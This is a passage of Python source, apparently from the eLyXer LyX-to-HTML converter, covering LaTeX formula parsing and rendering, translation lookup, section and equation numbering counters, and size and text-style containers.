    while not reader.currentline().startswith(self.ending):
      stripped = reader.currentline().strip()
      if len(stripped) > 0:
        Trace.error('Unparsed formula line ' + stripped)
      reader.nextline()
    reader.nextline()
    return formula
  def parseformula(self, reader):
    "Parse the formula contents"
    simple = FormulaConfig.starts['simple']
    if simple in reader.currentline():
      rest = reader.currentline().split(simple, 1)[1]
      if simple in rest:
        # formula is $...$
        return self.parsesingleliner(reader, simple, simple)
      # formula is multiline $...$
      return self.parsemultiliner(reader, simple, simple)
    if FormulaConfig.starts['complex'] in reader.currentline():
      # formula of the form \[...\]
      return self.parsemultiliner(reader, FormulaConfig.starts['complex'],
          FormulaConfig.endings['complex'])
    beginbefore = FormulaConfig.starts['beginbefore']
    beginafter = FormulaConfig.starts['beginafter']
    if beginbefore in reader.currentline():
      # environment form: keep the \begin{...}/\end{...} wrappers in the result
      if reader.currentline().strip().endswith(beginafter):
        current = reader.currentline().strip()
        endsplit = current.split(beginbefore)[1].split(beginafter)
        startpiece = beginbefore + endsplit[0] + beginafter
        endbefore = FormulaConfig.endings['endbefore']
        endafter = FormulaConfig.endings['endafter']
        endpiece = endbefore + endsplit[0] + endafter
        return startpiece + self.parsemultiliner(reader, startpiece, endpiece) + endpiece
      Trace.error('Missing ' + beginafter + ' in ' + reader.currentline())
      return ''
    begincommand = FormulaConfig.starts['command']
    beginbracket = FormulaConfig.starts['bracket']
    if begincommand in reader.currentline() and beginbracket in reader.currentline():
      # command-with-bracket form: parse only the bracketed body
      endbracket = FormulaConfig.endings['bracket']
      return self.parsemultiliner(reader, beginbracket, endbracket)
    Trace.error('Formula beginning ' + reader.currentline() + ' is unknown')
    return ''
  def parsesingleliner(self, reader, start, ending):
    "Parse a formula in one line"
    line = reader.currentline().strip()
    if not start in line:
      Trace.error('Line ' + line + ' does not contain formula start ' + start)
      return ''
    if not line.endswith(ending):
      Trace.error('Formula ' + line + ' does not end with ' + ending)
      return ''
    # keep only the text between the start and ending markers
    index = line.index(start)
    rest = line[index + len(start):-len(ending)]
    reader.nextline()
    return rest
  def parsemultiliner(self, reader, start, ending):
    "Parse a formula in multiple lines"
    formula = ''
    line = reader.currentline()
    if not start in line:
      Trace.error('Line ' + line.strip() + ' does not contain formula start ' + start)
      return ''
    index = line.index(start)
    line = line[index + len(start):].strip()
    # accumulate whole lines until one ends with the ending marker
    while not line.endswith(ending):
      formula += line + '\n'
      reader.nextline()
      line = reader.currentline()
    formula += line[:-len(ending)]
    reader.nextline()
    return formula
class MacroParser(FormulaParser):
  "A parser for a formula macro."
  def parseheader(self, reader):
    "See if the formula is inlined"
    self.begin = reader.linenumber + 1
    # macros are always treated as inline formulas
    return ['inline']
  def parse(self, reader):
    "Parse the formula until the end"
    # self.parent.start is presumably set by the owning container — confirm
    formula = self.parsemultiliner(reader, self.parent.start, self.ending)
    reader.nextline()
    return formula
class FormulaBit(Container):
  "A bit of a formula"
  # the bit type: 'alpha', 'number', 'font' or None
  type = None
  # relative display size; recomputed from contents by computesize()
  size = 1
  # the original formula text this bit was parsed from
  original = ''
  def __init__(self):
    "The formula bit type can be 'alpha', 'number', 'font'."
    self.contents = []
    self.output = ContentsOutput()
  def setfactory(self, factory):
    "Set the internal formula factory."
    self.factory = factory
    return self
  def add(self, bit):
    "Add any kind of formula bit already processed"
    self.contents.append(bit)
    # keep the original text in sync with the added contents
    self.original += bit.original
    bit.parent = self
  def skiporiginal(self, string, pos):
    "Skip a string and add it to the original formula"
    self.original += string
    if not pos.checkskip(string):
      Trace.error('String ' + string + ' not at ' + pos.identifier())
  def computesize(self):
    "Compute the size of the bit as the max of the sizes of all contents."
    if len(self.contents) == 0:
      return 1
    self.size = max([element.size for element in self.contents])
    return self.size
  def clone(self):
    "Return a copy of itself."
    # re-parse the original text so the copy is fully independent
    return self.factory.parseformula(self.original)
  def __unicode__(self):
    "Get a string representation"
    return self.__class__.__name__ + ' read in ' + self.original
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class TaggedBit(FormulaBit):
  "A formula bit wrapped in an HTML tag."
  def constant(self, constant, tag):
    "Wrap a single constant string in the given tag."
    self.output = TaggedOutput().settag(tag)
    self.add(FormulaConstant(constant))
    return self
  def complete(self, contents, tag, breaklines = False):
    "Wrap the given contents in the tag."
    self.contents = contents
    self.output = TaggedOutput().settag(tag, breaklines)
    return self
  def selfcomplete(self, tag):
    "Set the self-closing tag, no contents (as in <hr/>)."
    self.output = TaggedOutput().settag(tag, empty = True)
    return self
class FormulaConstant(Constant):
  "A constant string inside a formula."
  def __init__(self, string):
    "Store the constant string and reset size and type."
    Constant.__init__(self, string)
    self.original = string
    self.type = None
    self.size = 1
  def computesize(self):
    "A constant always has size 1."
    return self.size
  def clone(self):
    "Return a fresh constant built from the same original string."
    return FormulaConstant(self.original)
  def __unicode__(self):
    "Return a printable representation."
    return 'Formula constant: ' + self.string
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class RawText(FormulaBit):
  "A run of plain alphabetic text inside a formula."
  def detect(self, pos):
    "Detect a bit of raw text."
    return pos.current().isalpha()
  def parsebit(self, pos):
    "Glob the alphabetic run and store it as a constant."
    self.type = 'alpha'
    self.add(FormulaConstant(pos.globalpha()))
class FormulaSymbol(FormulaBit):
  "A symbol inside a formula"
  modified = FormulaConfig.modified
  unmodified = FormulaConfig.unmodified['characters']
  def detect(self, pos):
    "Detect either an unmodified or a modified symbol."
    char = pos.current()
    return char in FormulaSymbol.unmodified or char in FormulaSymbol.modified
  def parsebit(self, pos):
    "Parse the symbol, translating it if it is a modified one."
    char = pos.current()
    if char in FormulaSymbol.unmodified:
      self.addsymbol(char, pos)
    elif char in FormulaSymbol.modified:
      self.addsymbol(FormulaSymbol.modified[char], pos)
    else:
      Trace.error('Symbol ' + char + ' not found')
  def addsymbol(self, symbol, pos):
    "Consume the source character and store the (possibly translated) symbol."
    self.skiporiginal(pos.current(), pos)
    self.contents.append(FormulaConstant(symbol))
class FormulaNumber(FormulaBit):
  "A run of digits inside a formula."
  def detect(self, pos):
    "Detect a digit."
    return pos.current().isdigit()
  def parsebit(self, pos):
    "Glob all consecutive digits into a single constant."
    self.type = 'number'
    self.add(FormulaConstant(pos.glob(lambda: pos.current().isdigit())))
class Comment(FormulaBit):
  "A LaTeX comment: % to the end of the line."
  start = FormulaConfig.starts['comment']
  def detect(self, pos):
    "Detect the %."
    return pos.current() == self.start
  def parsebit(self, pos):
    "Swallow everything up to and including the newline."
    self.original += pos.globincluding('\n')
class WhiteSpace(FormulaBit):
  "Some white space inside a formula."
  def detect(self, pos):
    "Detect the white space."
    return pos.current().isspace()
  def parsebit(self, pos):
    "Consume the whole whitespace run, keeping it in the original text."
    self.original += pos.skipspace()
  def __unicode__(self):
    "Return a printable representation."
    return 'Whitespace: *' + self.original + '*'
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class Bracket(FormulaBit):
  "A {} bracket inside a formula"
  start = FormulaConfig.starts['bracket']
  ending = FormulaConfig.endings['bracket']
  def __init__(self):
    "Create a (possibly literal) new bracket"
    FormulaBit.__init__(self)
    self.inner = None
  def detect(self, pos):
    "Detect the start of a bracket"
    return pos.checkfor(self.start)
  def parsebit(self, pos):
    "Parse the bracket as a full formula."
    self.parsecomplete(pos, self.innerformula)
    return self
  def parsetext(self, pos):
    "Parse a text bracket"
    self.parsecomplete(pos, self.innertext)
    return self
  def parseliteral(self, pos):
    "Parse a literal bracket"
    self.parsecomplete(pos, self.innerliteral)
    return self
  def parsecomplete(self, pos, innerparser):
    "Parse the start and end marks"
    if not pos.checkfor(self.start):
      Trace.error('Bracket should start with ' + self.start + ' at ' + pos.identifier())
      return None
    self.skiporiginal(self.start, pos)
    # push the closing mark so finished() stops the inner parser at it
    pos.pushending(self.ending)
    innerparser(pos)
    self.original += pos.popending(self.ending)
    self.computesize()
  def innerformula(self, pos):
    "Parse a whole formula inside the bracket"
    while not pos.finished():
      self.add(self.factory.parseany(pos))
  def innertext(self, pos):
    "Parse some text inside the bracket, following textual rules."
    # only these characters are handed to the formula factory; the rest
    # is taken verbatim as constants
    specialchars = list(FormulaConfig.symbolfunctions.keys())
    specialchars.append(FormulaConfig.starts['command'])
    specialchars.append(FormulaConfig.starts['bracket'])
    specialchars.append(Comment.start)
    while not pos.finished():
      if pos.current() in specialchars:
        self.add(self.factory.parseany(pos))
        if pos.checkskip(' '):
          self.original += ' '
      else:
        self.add(FormulaConstant(pos.skipcurrent()))
  def innerliteral(self, pos):
    "Parse a literal inside the bracket, which does not generate HTML."
    self.literal = ''
    # nested brackets recurse; everything else is accumulated verbatim
    while not pos.finished() and not pos.current() == self.ending:
      if pos.current() == self.start:
        self.parseliteral(pos)
      else:
        self.literal += pos.skipcurrent()
    self.original += self.literal
class SquareBracket(Bracket):
  "A [] bracket inside a formula"
  start = FormulaConfig.starts['squarebracket']
  ending = FormulaConfig.endings['squarebracket']
  def clone(self):
    "Return a new square bracket sharing this one's contents."
    duplicate = SquareBracket()
    duplicate.contents = self.contents
    return duplicate
class MathsProcessor(object):
  "Base class for processors of maths constructions inside the FormulaProcessor."
  def process(self, contents, index):
    "Abstract hook: process one element of a formula's contents."
    Trace.error('Unimplemented process() in ' + unicode(self))
  def __unicode__(self):
    "Return a printable description."
    return 'Maths processor ' + self.__class__.__name__
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class FormulaProcessor(object):
  "A processor specifically for formulas."
  # registered MathsProcessor instances, applied to every element
  processors = []
  def process(self, bit):
    "Process the contents of every formula bit, recursively."
    self.processcontents(bit)
    self.processinsides(bit)
    self.traversewhole(bit)
  def processcontents(self, bit):
    "Process the contents of a formula bit."
    if not isinstance(bit, FormulaBit):
      return
    bit.process()
    for element in bit.contents:
      self.processcontents(element)
  def processinsides(self, bit):
    "Process the insides (limits, brackets) in a formula bit."
    if not isinstance(bit, FormulaBit):
      return
    for index, element in enumerate(bit.contents):
      # every registered processor sees every position
      for processor in self.processors:
        processor.process(bit.contents, index)
      # continue with recursive processing
      self.processinsides(element)
  def traversewhole(self, formula):
    "Traverse over the contents to alter variables and space units."
    last = None
    for bit, contents in self.traverse(formula):
      if bit.type == 'alpha':
        self.italicize(bit, contents)
      elif bit.type == 'font' and last and last.type == 'number':
        # insert a thin separator between a number and a following font bit
        bit.contents.insert(0, FormulaConstant(u' '))
      last = bit
  def traverse(self, bit):
    "Traverse a formula and yield a flattened structure of (bit, list) pairs."
    for element in bit.contents:
      # typed elements are yielded; untyped bits are descended into
      if hasattr(element, 'type') and element.type:
        yield (element, bit.contents)
      elif isinstance(element, FormulaBit):
        for pair in self.traverse(element):
          yield pair
  def italicize(self, bit, contents):
    "Italicize the given bit of text."
    index = contents.index(bit)
    contents[index] = TaggedBit().complete([bit], 'i')
class Formula(Container):
  "A LaTeX formula"
  def __init__(self):
    self.parser = FormulaParser()
    self.output = TaggedOutput().settag('span class="formula"')
  def process(self):
    "Convert the formula to tags"
    if self.header[0] == 'inline':
      DocumentParameters.displaymode = False
    else:
      # block formula: record display mode and switch to a block-level div
      DocumentParameters.displaymode = True
      self.output.settag('div class="formula"', True)
    # choose the output flavor according to the command-line options
    if Options.jsmath:
      self.jsmath()
    elif Options.mathjax:
      self.mathjax()
    elif Options.googlecharts:
      self.googlecharts()
    else:
      self.classic()
  def jsmath(self):
    "Make the contents for jsMath."
    # jsMath picks up elements with class "math"; the raw TeX goes inside
    if self.header[0] != 'inline':
      self.output = TaggedOutput().settag('div class="math"')
    else:
      self.output = TaggedOutput().settag('span class="math"')
    self.contents = [Constant(self.parsed)]
  def mathjax(self):
    "Make the contents for MathJax."
    self.output.tag = 'span class="MathJax_Preview"'
    # MathJax reads the TeX source from a script tag of type math/tex
    tag = 'script type="math/tex'
    if self.header[0] != 'inline':
      tag += ';mode=display'
    self.contents = [TaggedText().constant(self.parsed, tag + '"', True)]
  def googlecharts(self):
    "Make the contents using Google Charts http://code.google.com/apis/chart/."
    # the chart API renders the URL-encoded TeX as an image
    url = FormulaConfig.urls['googlecharts'] + quote_plus(self.parsed)
    img = '<img class="chart" src="' + url + '" alt="' + self.parsed + '"/>'
    self.contents = [Constant(img)]
  def classic(self):
    "Make the contents using classic output generation with XHTML and CSS."
    whole = FormulaFactory().parseformula(self.parsed)
    FormulaProcessor().process(whole)
    whole.parent = self
    self.contents = [whole]
  def parse(self, pos):
    "Parse using a parse position instead of self.parser."
    # dispatch on the four LaTeX formula delimiters
    if pos.checkskip('$$'):
      self.parsedollarblock(pos)
    elif pos.checkskip('$'):
      self.parsedollarinline(pos)
    elif pos.checkskip('\\('):
      self.parseinlineto(pos, '\\)')
    elif pos.checkskip('\\['):
      self.parseblockto(pos, '\\]')
    else:
      pos.error('Unparseable formula')
    self.process()
    return self
  def parsedollarinline(self, pos):
    "Parse a $...$ formula."
    self.header = ['inline']
    self.parsedollar(pos)
  def parsedollarblock(self, pos):
    "Parse a $$...$$ formula."
    self.header = ['block']
    self.parsedollar(pos)
    # parsedollar consumed the first closing $; the second must follow
    if not pos.checkskip('$'):
      pos.error('Formula should be $$...$$, but last $ is missing.')
  def parsedollar(self, pos):
    "Parse to the next $."
    pos.pushending('$')
    self.parsed = pos.globexcluding('$')
    pos.popending('$')
  def parseinlineto(self, pos, limit):
    "Parse a \\(...\\) formula."
    self.header = ['inline']
    self.parseupto(pos, limit)
  def parseblockto(self, pos, limit):
    "Parse a \\[...\\] formula."
    self.header = ['block']
    self.parseupto(pos, limit)
  def parseupto(self, pos, limit):
    "Parse a formula that ends with the given command."
    pos.pushending(limit)
    # glob unconditionally; the pushed ending bounds the glob
    self.parsed = pos.glob(lambda: True)
    pos.popending(limit)
  def __unicode__(self):
    "Return a printable representation."
    if self.partkey and self.partkey.number:
      return 'Formula (' + self.partkey.number + ')'
    return 'Unnumbered formula'
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class WholeFormula(FormulaBit):
  "Parse a whole formula"
  def detect(self, pos):
    "Not outside the formula is enough."
    return not pos.finished()
  def parsebit(self, pos):
    "Consume formula bits of any kind until the end."
    while not pos.finished():
      bit = self.factory.parseany(pos)
      self.add(bit)
class FormulaFactory(object):
  "Construct bits of formula"
  # bit types will be appended later
  types = [FormulaSymbol, RawText, FormulaNumber, Bracket, Comment, WhiteSpace]
  skippedtypes = [Comment, WhiteSpace]
  defining = False
  def __init__(self):
    "Initialize the map of cached instances."
    self.instances = dict()
  def detecttype(self, type, pos):
    "Detect a bit of a given type."
    if pos.finished():
      return False
    return self.instance(type).detect(pos)
  def instance(self, type):
    "Get a cached instance of the given type, creating one when missing."
    if type not in self.instances or not self.instances[type]:
      self.instances[type] = self.create(type)
    return self.instances[type]
  def create(self, type):
    "Create a new formula bit of the given type."
    return Cloner.create(type).setfactory(self)
  def clearskipped(self, pos):
    "Skip over all skippable types at the current position."
    while not pos.finished():
      if not self.skipany(pos):
        return
  def skipany(self, pos):
    "Skip a single skippable type, if one is detected."
    for skipped in self.skippedtypes:
      if self.instance(skipped).detect(pos):
        return self.parsetype(skipped, pos)
    return None
  def parseany(self, pos):
    "Parse any formula bit at the current location."
    for type in self.types + self.skippedtypes:
      if self.detecttype(type, pos):
        return self.parsetype(type, pos)
    Trace.error('Unrecognized formula at ' + pos.identifier())
    return FormulaConstant(pos.skipcurrent())
  def parsetype(self, type, pos):
    "Parse the given type and return it."
    bit = self.instance(type)
    # drop the cached instance: it now carries parse state
    self.instances[type] = None
    returnedbit = bit.parsebit(pos)
    if returnedbit:
      return returnedbit.setfactory(self)
    return bit
  def parseformula(self, formula):
    "Parse a string of text that contains a whole formula."
    pos = TextPosition(formula)
    whole = self.create(WholeFormula)
    if whole.detect(pos):
      whole.parsebit(pos)
      return whole
    # no formula found
    if not pos.finished():
      Trace.error('Unknown formula at: ' + pos.identifier())
      whole.add(TaggedBit().constant(formula, 'span class="unknown"'))
    return whole
class Translator(object):
  "Reads the configuration file and tries to find a translation."
  "Otherwise falls back to the messages in the config file."
  instance = None
  def translate(cls, key):
    "Get the translated message for a key."
    return cls.instance.getmessage(key)
  translate = classmethod(translate)
  def __init__(self):
    self.translation = None
    self.first = True
  def findtranslation(self):
    "Find the translation for the document language."
    self.langcodes = None
    if not DocumentParameters.language:
      Trace.error('No language in document')
      return
    if not DocumentParameters.language in TranslationConfig.languages:
      Trace.error('Unknown language ' + DocumentParameters.language)
      return
    if TranslationConfig.languages[DocumentParameters.language] == 'en':
      # English is the fallback built into the config: no catalog needed
      return
    langcodes = [TranslationConfig.languages[DocumentParameters.language]]
    try:
      self.translation = gettext.translation('elyxer', None, langcodes)
    except IOError:
      Trace.error('No translation for ' + unicode(langcodes))
  def getmessage(self, key):
    "Get the translated message for the given key."
    if self.first:
      # locate the catalog lazily, on the first message only
      self.findtranslation()
      self.first = False
    message = self.getuntranslated(key)
    if not self.translation:
      return message
    # ugettext() was removed in Python 3, where gettext() already returns
    # unicode; prefer ugettext when present (Python 2) and fall back
    lookup = getattr(self.translation, 'ugettext', self.translation.gettext)
    try:
      message = lookup(message)
    except IOError:
      pass
    return message
  def getuntranslated(self, key):
    "Get the untranslated message."
    if not key in TranslationConfig.constants:
      Trace.error('Cannot translate ' + key)
      return key
    return TranslationConfig.constants[key]
Translator.instance = Translator()
class NumberCounter(object):
  "A counter for numbers (by default)."
  "The type can be changed to return letters, roman numbers..."
  name = None
  value = None
  mode = None
  master = None
  letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  symbols = NumberingConfig.sequence['symbols']
  romannumerals = [
      ('M', 1000), ('CM', 900), ('D', 500), ('CD', 400), ('C', 100),
      ('XC', 90), ('L', 50), ('XL', 40), ('X', 10), ('IX', 9), ('V', 5),
      ('IV', 4), ('I', 1)
      ]
  def __init__(self, name):
    "Give a name to the counter."
    self.name = name
  def setmode(self, mode):
    "Set the counter mode. Can be changed at runtime."
    self.mode = mode
    return self
  def init(self, value):
    "Set an initial value."
    self.value = value
  def gettext(self):
    "Get the current value as a text string."
    return unicode(self.value)
  def getletter(self):
    "Get the current value as a letter."
    return self.getsequence(self.letters)
  def getsymbol(self):
    "Get the current value as a symbol."
    return self.getsequence(self.symbols)
  def getsequence(self, sequence):
    "Get the current value from a sequence, wrapping around its length."
    return sequence[(self.value - 1) % len(sequence)]
  def getroman(self):
    "Get the current value as a roman number."
    result = ''
    number = self.value
    for numeral, value in self.romannumerals:
      if number >= value:
        # integer division: plain '/' yields a float on Python 3,
        # which breaks the string repetition below
        result += numeral * (number // value)
        number = number % value
    return result
  def getvalue(self):
    "Get the current value as configured in the current mode."
    if not self.mode or self.mode in ['text', '1']:
      return self.gettext()
    if self.mode == 'A':
      return self.getletter()
    if self.mode == 'a':
      return self.getletter().lower()
    if self.mode == 'I':
      return self.getroman()
    if self.mode == '*':
      return self.getsymbol()
    Trace.error('Unknown counter mode ' + self.mode)
    return self.gettext()
  def getnext(self):
    "Increase the current value and get the next value as configured."
    if not self.value:
      self.value = 0
    self.value += 1
    return self.getvalue()
  def reset(self):
    "Reset the counter."
    self.value = 0
  def __unicode__(self):
    "Return a printable representation."
    result = 'Counter ' + self.name
    if self.mode:
      result += ' in mode ' + self.mode
    return result
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class DependentCounter(NumberCounter):
  "A counter which depends on another one (the master)."
  def setmaster(self, master):
    "Set the master counter."
    self.master = master
    self.last = self.master.getvalue()
    return self
  def getnext(self):
    "Restart when the master counter has moved on; otherwise just increase."
    current = self.master.getvalue()
    if self.last != current:
      self.reset()
    value = NumberCounter.getnext(self)
    self.last = current
    return value
  def getvalue(self):
    "Get the value of the combined counter: master.dependent."
    return self.master.getvalue() + '.' + NumberCounter.getvalue(self)
class NumberGenerator(object):
  "A number generator for unique sequences and hierarchical structures. Used in:"
  " * ordered part numbers: Chapter 3, Section 5.3."
  " * unique part numbers: Footnote 15, Bibliography cite [15]."
  " * chaptered part numbers: Figure 3.15, Equation (8.3)."
  " * unique roman part numbers: Part I, Book IV."
  # singleton generators, bound right after the class definitions below
  chaptered = None
  generator = None
  # lower-cased layout names taken from the numbering configuration
  romanlayouts = [x.lower() for x in NumberingConfig.layouts['roman']]
  orderedlayouts = [x.lower() for x in NumberingConfig.layouts['ordered']]
  # class-level dict: counters are shared by every generator instance
  counters = dict()
  appendix = None
  def deasterisk(self, type):
    "Remove the possible asterisk in a layout type."
    return type.replace('*', '')
  def isunique(self, type):
    "Find out if the layout type corresponds to a unique part."
    return self.isroman(type)
  def isroman(self, type):
    "Find out if the layout type should have roman numeration."
    return self.deasterisk(type).lower() in self.romanlayouts
  def isinordered(self, type):
    "Find out if the layout type corresponds to an (un)ordered part."
    return self.deasterisk(type).lower() in self.orderedlayouts
  def isnumbered(self, type):
    "Find out if the type for a layout corresponds to a numbered layout."
    # asterisked layouts (e.g. Section*) are never numbered
    if '*' in type:
      return False
    if self.isroman(type):
      return True
    if not self.isinordered(type):
      return False
    # layouts deeper than the configured maxdepth stay unnumbered
    if self.getlevel(type) > DocumentParameters.maxdepth:
      return False
    return True
  def isunordered(self, type):
    "Find out if the type contains an asterisk, basically."
    return '*' in type
  def getlevel(self, type):
    "Get the level that corresponds to a layout type."
    if self.isunique(type):
      return 0
    if not self.isinordered(type):
      Trace.error('Unknown layout type ' + type)
      return 0
    type = self.deasterisk(type).lower()
    level = self.orderedlayouts.index(type) + 1
    # startinglevel shifts the hierarchy, presumably for document classes
    # without chapters -- confirm against DocumentParameters
    return level - DocumentParameters.startinglevel
  def getparttype(self, type):
    "Obtain the type for the part: without the asterisk, "
    "and switched to Appendix if necessary."
    if NumberGenerator.appendix and self.getlevel(type) == 1:
      return 'Appendix'
    return self.deasterisk(type)
  def generate(self, type):
    "Generate a number for a layout type."
    "Unique part types such as Part or Book generate roman numbers: Part I."
    "Ordered part types return dot-separated tuples: Chapter 5, Subsection 2.3.5."
    "Everything else generates unique numbers: Bibliography [1]."
    "Each invocation results in a new number."
    return self.getcounter(type).getnext()
  def getcounter(self, type):
    "Get the counter for the given type."
    type = type.lower()
    if not type in self.counters:
      self.counters[type] = self.create(type)
    return self.counters[type]
  def create(self, type):
    "Create a counter for the given type."
    # numbered layouts below the top level hang from the level above
    if self.isnumbered(type) and self.getlevel(type) > 1:
      index = self.orderedlayouts.index(type)
      above = self.orderedlayouts[index - 1]
      master = self.getcounter(above)
      return self.createdependent(type, master)
    counter = NumberCounter(type)
    if self.isroman(type):
      counter.setmode('I')
    return counter
  def getdependentcounter(self, type, master):
    "Get (or create) a counter of the given type that depends on another."
    if not type in self.counters or not self.counters[type].master:
      self.counters[type] = self.createdependent(type, master)
    return self.counters[type]
  def createdependent(self, type, master):
    "Create a dependent counter given the master."
    return DependentCounter(type).setmaster(master)
  def startappendix(self):
    "Start appendices here."
    # switch the top-level counter to letters (A, B, ...) and restart it
    firsttype = self.orderedlayouts[DocumentParameters.startinglevel]
    counter = self.getcounter(firsttype)
    counter.setmode('A').reset()
    NumberGenerator.appendix = True
class ChapteredGenerator(NumberGenerator):
  "Generate chaptered numbers, as in Chapter.Number."
  "Used in equations, figures: Equation (5.3), figure 8.15."
  def generate(self, type):
    "Generate a number which goes with first-level numbers (chapters). "
    "For the article classes a unique number is generated."
    if DocumentParameters.startinglevel > 0:
      # no chapters in this class: fall back to plain unique numbering
      return NumberGenerator.generator.generate(type)
    return self.getdependentcounter(type, self.getcounter('Chapter')).getnext()
NumberGenerator.chaptered = ChapteredGenerator()
NumberGenerator.generator = NumberGenerator()
class ContainerSize(object):
  "The size of a container."
  width = None
  height = None
  maxwidth = None
  maxheight = None
  scale = None
  def set(self, width = None, height = None):
    "Set the proper size with width and height."
    self.setvalue('width', width)
    self.setvalue('height', height)
    return self
  def setmax(self, maxwidth = None, maxheight = None):
    "Set max width and/or height."
    self.setvalue('maxwidth', maxwidth)
    self.setvalue('maxheight', maxheight)
    return self
  def readparameters(self, container):
    "Read some size parameters off a container."
    self.setparameter(container, 'width')
    self.setparameter(container, 'height')
    self.setparameter(container, 'scale')
    self.checkvalidheight(container)
    return self
  def setparameter(self, container, name):
    "Read a size parameter off a container, and set it if present."
    value = container.getparameter(name)
    self.setvalue(name, value)
  def setvalue(self, name, value):
    "Set the value of a parameter name, only if it's valid."
    value = self.processparameter(value)
    if value:
      setattr(self, name, value)
  def checkvalidheight(self, container):
    "Check if the height parameter is valid; otherwise erase it."
    heightspecial = container.getparameter('height_special')
    # a height of '1 totalheight' means natural height: treat as unset
    if self.height and self.extractnumber(self.height) == '1' and heightspecial == 'totalheight':
      self.height = None
  def processparameter(self, value):
    "Do the full processing on a parameter."
    # discard empty and zero values; strip any configured ignored texts
    if not value:
      return None
    if self.extractnumber(value) == '0':
      return None
    for ignored in StyleConfig.size['ignoredtexts']:
      if ignored in value:
        value = value.replace(ignored, '')
    return value
  def extractnumber(self, text):
    "Extract the leading number in the given text (digits plus one decimal point)."
    result = ''
    decimal = False
    for char in text:
      if char.isdigit():
        result += char
      elif char == '.' and not decimal:
        result += char
        decimal = True
      else:
        return result
    return result
  def checkimage(self, width, height):
    "Check image dimensions, set them if possible."
    if width:
      self.maxwidth = unicode(width) + 'px'
      if self.scale and not self.width:
        self.width = self.scalevalue(width)
    if height:
      self.maxheight = unicode(height) + 'px'
      if self.scale and not self.height:
        self.height = self.scalevalue(height)
    # with a single dimension set, let the browser scale the other one
    if self.width and not self.height:
      self.height = 'auto'
    if self.height and not self.width:
      self.width = 'auto'
  def scalevalue(self, value):
    "Scale the value according to the image scale and return it as unicode."
    scaled = value * int(self.scale) / 100
    return unicode(int(scaled)) + 'px'
  def removepercentwidth(self):
    "Remove percent width if present, to set it at the figure level."
    if not self.width:
      return None
    if not '%' in self.width:
      return None
    width = self.width
    self.width = None
    if self.height == 'auto':
      self.height = None
    return width
  def addstyle(self, container):
    "Add the proper style attribute to the output tag."
    if not isinstance(container.output, TaggedOutput):
      Trace.error('No tag to add style, in ' + unicode(container))
      # bail out: only a TaggedOutput carries a tag to append the style to
      return
    if not self.width and not self.height and not self.maxwidth and not self.maxheight:
      # nothing to see here; move along
      return
    tag = ' style="'
    tag += self.styleparameter('width')
    tag += self.styleparameter('maxwidth')
    tag += self.styleparameter('height')
    tag += self.styleparameter('maxheight')
    if tag[-1] == ' ':
      tag = tag[:-1]
    tag += '"'
    container.output.tag += tag
  def styleparameter(self, name):
    "Get the style for a single parameter."
    value = getattr(self, name)
    if value:
      return name.replace('max', 'max-') + ': ' + value + '; '
    return ''
class QuoteContainer(Container):
  "A container for a pretty quote"
  def __init__(self):
    self.parser = BoundedParser()
    self.output = FixedOutput()
  def process(self):
    "Look up the quote type and emit the matching character."
    self.type = self.header[2]
    if self.type not in StyleConfig.quotes:
      Trace.error('Quote type ' + self.type + ' not found')
      self.html = ['"']
      return
    self.html = [StyleConfig.quotes[self.type]]
class LyXLine(Container):
  "A Lyx line"
  def __init__(self):
    self.parser = LoneCommand()
    self.output = FixedOutput()
  def process(self):
    "Emit a horizontal rule."
    self.html = ['<hr class="line" />']
class EmphaticText(TaggedText):
  "Text with emphatic mode"
  def process(self):
    "Render the emphasis as italics."
    self.output.tag = 'i'
class ShapedText(TaggedText):
  "Text shaped (italic, slanted)"
  def process(self):
    "Map the shape to its configured tag; fall back to a plain span."
    self.type = self.header[1]
    if self.type in TagConfig.shaped:
      self.output.tag = TagConfig.shaped[self.type]
      return
    Trace.error('Unrecognized shape ' + self.header[1])
    self.output.tag = 'span'
class VersalitasText(TaggedText):
  "Text in versalitas"
  def process(self):
    "Render as small caps via the versalitas CSS class."
    self.output.tag = 'span class="versalitas"'
class ColorText(TaggedText):
  "Colored text"
  def process(self):
    "Use the color name as the span class."
    self.color = self.header[1]
    self.output.tag = 'span class="' + self.color + '"'
class SizeText(TaggedText):
  "Sized text"
  def process(self):
    "Use the size name as the span class."
    self.size = self.header[1]
    self.output.tag = 'span class="' + self.size + '"'
class BoldText(TaggedText):
  "Bold text"
  def process(self):
    "Render in boldface."
    self.output.tag = 'b'
class TextFamily(TaggedText):
  "A bit of text from a different family"
  def process(self):
    "Parse the type of family"
    self.type = self.header[1]
    if not self.type in TagConfig.family:
      # report the offending value: the original concatenated the builtin
      # 'type' (a class object) instead of self.type, raising a TypeError
      Trace.error('Unrecognized family ' + self.type)
      self.output.tag = 'span'
      return
    self.output.tag = TagConfig.family[self.type]
class Hfill(TaggedText):
  "Horizontal fill"
  def process(self):
    "Render as a horizontal-fill span."
    self.output.tag = 'span class="hfill"'
class BarredText(TaggedText):
  "Text with a bar somewhere"
  def process(self):
    "Map the bar type to its configured tag; fall back to a plain span."
    self.type = self.header[1]
    if self.type in TagConfig.barred:
      self.output.tag = TagConfig.barred[self.type]
      return
    Trace.error('Unknown bar type ' + self.type)
    self.output.tag = 'span'
class LangLine(TaggedText):
  "A line with language information"
  def process(self):
    "Only generate a span with lang info when the language is recognized."
    lang = self.header[1]
    if lang in TranslationConfig.languages:
      isolang = TranslationConfig.languages[lang]
      self.output = TaggedOutput().settag('span lang="' + isolang + '"', False)
    else:
      self.output = ContentsOutput()
class InsetLength(BlackBox):
  "A length measure inside an inset."
  def process(self):
    "Remember the measure for the containing inset."
    self.length = self.header[1]
class Space(Container):
  "A space of several types"
  def __init__(self):
    self.parser = InsetParser()
    self.output = FixedOutput()
  def process(self):
    "Translate the space type to HTML, adding a styled span for lengths."
    self.type = self.header[2]
    if self.type not in StyleConfig.hspaces:
      Trace.error('Unknown space type ' + self.type)
      self.html = [' ']
      return
    self.html = [StyleConfig.hspaces[self.type]]
    length = self.getlength()
    if not length:
      return
    # a length was given: emit a span sized accordingly
    self.output = TaggedOutput().settag('span class="hspace"', False)
    ContainerSize().set(length).addstyle(self)
  def getlength(self):
    "Get the space length from the contents, when given as an InsetLength."
    if self.contents and isinstance(self.contents[0], InsetLength):
      return self.contents[0].length
